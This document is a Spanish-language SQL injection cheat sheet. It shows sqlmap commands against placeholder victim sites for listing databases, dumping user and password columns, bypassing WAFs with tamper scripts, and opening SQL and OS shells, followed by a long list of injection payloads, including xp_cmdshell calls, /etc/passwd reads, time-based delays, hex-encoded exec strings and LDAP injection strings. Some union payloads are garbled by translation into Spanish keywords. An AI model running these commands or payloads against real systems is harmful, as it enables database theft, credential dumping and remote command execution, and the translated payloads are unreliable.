SQLMAP:
--wizard = GUIADO
MAN 
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


POST:
sqlmap -u "http://victima.con/busqueda.php" --method POST --data "param1=FUZZ&param2=FUZZ" 

*si es HTTPS,forzar la conexión SSL a 443 / tcp.  --force-ssl:443Host


==========================================
GET:
sqlmap -u "http://web.com.co" --data="param1=parametro1&param2=parametro2" -p "param1" --dbs
sqlmap -u "http://victima.con/busqueda.php?param=texto+a+buscar&param2=FUZZ" -p param2

==========
EJEM:
sqlmap.py -u "http://www.paginaparaejemplo.com/algo.php?id=1&id2=1&id3=1" //vemos is es vulnerable
sqlmap.py -u "http://www.paginaparaejemplo.com/algo.php?id=1&id2=1&id3=1" --dbs  // sacaremoslas bbdd
sqlmap.py -u "http://www.paginaparaejemplo.com/algo.php?id=1&id2=1&id3=1" -D nombre_DB --tables //usamos  elnombre de la bbd y le decimos sacar las tablas de la bbdd
sqlmap.py -u "http://www.paginaparaejemplo.com/algo.php?id=1&id2=1&id3=1" -D nombre_DB -T usuarios --columns //le decimos que de la tabla susrio saque las columnas
sqlmap.py -u "http://www.paginaparaejemplo.com/algo.php?id=1&id2=1&id3=1" -D nombre_DB -T usuarios -C id,name,email,passwd --dump  sacamos la informacion de la tabla las columnas que hay


=========
TAMPER=archivo python para camuflar los payloads para bypassear WAF. depende del tipo de bbdd
lista de tampers::https://github.com/sqlmapproject/sqlmap/tree/master/tamper

sqlmap.py -u "http://www.paginaparaejemplo.com/algo.php?id=1&id2=1&id3=1" --tamper="nombredeltamper1,nombredeltamper2,nombredeltamper3,etc"

==============
TECNICAS:
B: Boolean-based blind
E: Error-based
U: Union query-based
S: Stacked queries
T: Time-based blind
Q: Inline queries

--technique=BEUSTQ
sqlmap.py -u "http://www.paginaparaejemplo.com/algo.php?id=1&id2=1&id3=1" --technique=B
============
SHELL:
Sql shell:
sqlmap -u "http://victima.com/busqueda.php?param=FUZZ" --sql-query "SELECT 'id' from usuarios" 
sqlmap.py -u "http://www.paginaparaejemplo.com/algo.php?id=1&id2=1&id3=1" --sql-shell
OS shell:
sqlmap -u "http://victima.com/busqueda.php?param=FUZZ" --os-shell




=============================
COMANDOS SQL
SELECT Utilizado para consultar registros de la base de datos que satisfagan un criterio determinado
INSERT Utilizado para cargar lotes de datos en la base de datos en una única operación.
UPDATE Utilizado para modificar los valores de los campos y registros especificados Utilizado para modificar las tablas agregando campos o cambiando la definición de los campos.
DELETE Utilizado para eliminar registros de una tabla

CLAUSULAS
FROM Utilizada para especificar la tabla de la cual se van a seleccionar los registros
GROUP BY Utilizada para separar los registros seleccionados en grupos específicos
HAVING Utilizada para expresar condición que debe satisfacer cada grupo
ORDER BY Utilizada para ordenar los registros seleccionados de acuerdo con un orden específico
WHERE Utilizada para determinar los registros seleccionados en la clausula FROM

TIPOS DE INYECCIÓN SQL
Inyeccion SQL In-Band(SQL inyection Clasico)
    Basada es error (verificacion si es vulnerable)
 Basada en Uniones
InyeccionSQL Inferencial (Inyección SQL ciega)
    Basada en Booleanos (Boolean-based)
 Basada en tiempo -- Investigar más
Inyeccion SQL Fuera de Banda
    Envio de peticiones al servidor controlado por el atacante

CARGAS ÚTILES:
'or1=1 --
'o ''='
'o 1=1 --
' o ''
-- o #
' o '1
' o 1 -- -
" o " "="
"o 1=1 -- -
' o ''=''
'=0 -- +
o 1=1
'o'1'='1

SELECCIONE first_name, last_name DE usuarios DONDE user_id = ' o 1 =1 unión seleccione 1,2 #
' o 1=1 unión seleccione usuario(),1 #
' o 1=1 unión seleccione versión(),1 #
' unión seleccione 1.@@version #
' unión seleccione null,@@hostname #
' unión todos seleccione system_user(),usuario() #
' unión, seleccione null,base de datos() #
' unión seleccione null,table_name de information_schema.tables #
' unión seleccione null,@@datadir #
' unión todos seleccionen load_file('/etc/passwd'),null #
'o 1=1 unión seleccione usuario, contraseña de usuarios #

'sqlvuln
'+sqlvuln
sqlvuln;
(sqlvuln)
a' or 1=1--
"a"" or 1=1--"
 or a = a
a' or 'a' = 'a
1 or 1=1
a' waitfor delay '0:0:10'--
1 waitfor delay '0:0:10'--
declare @q nvarchar (4000) select @q =
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
0
031003000270000
declare @s varchar(22) select @s =
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
exec(@s)
a'
?
' or 1=1
‘ or 1=1 --
x' AND userid IS NULL; --
x' AND email IS NULL; --
anything' OR 'x'='x
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND members.email IS NULL; --
x' OR full_name LIKE '%Bob%
23 OR 1=1
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'
'%20or%20''='
'%20or%20'x'='x
%20or%20x=x
')%20or%20('x'='x
0 or 1=1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
 or 0=0 #"
or 0=0 #
' or 1=1--
" or 1=1--
' or '1'='1'--
' or 1 --'
or 1=1--
or%201=1
or%201=1 --
' or 1=1 or ''='
 or 1=1 or ""=
' or a=a--
 or a=a
') or ('a'='a
) or (a=a
hi or a=a
hi or 1=1 --"
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
"hi"") or (""a""=""a"
'hi' or 'x'='x';
@variable
,@variable
PRINT
PRINT @@variable
select
insert
as
or
procedure
limit
order by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
exec xp
exec sp
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
\x27UNION SELECT
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
to_timestamp_tz
tz_offset
<>"'%;)(&+
'%20or%201=1
%27%20or%201=1
%20$(sleep%2050)
%20'sleep%2050'
char%4039%41%2b%40SELECT
&apos;%20OR
'sqlattempt1
(sqlattempt2)
|
%7C
*|
%2A%7C
*(|(mail=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28objectclass%3D%2A%29%29
(
%28
)
%29
&
%26
!
%21
' or 1=1 or ''='
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
a' or 3=3--
"a"" or 3=3--"
' or 3=3
‘ or 3=3 --


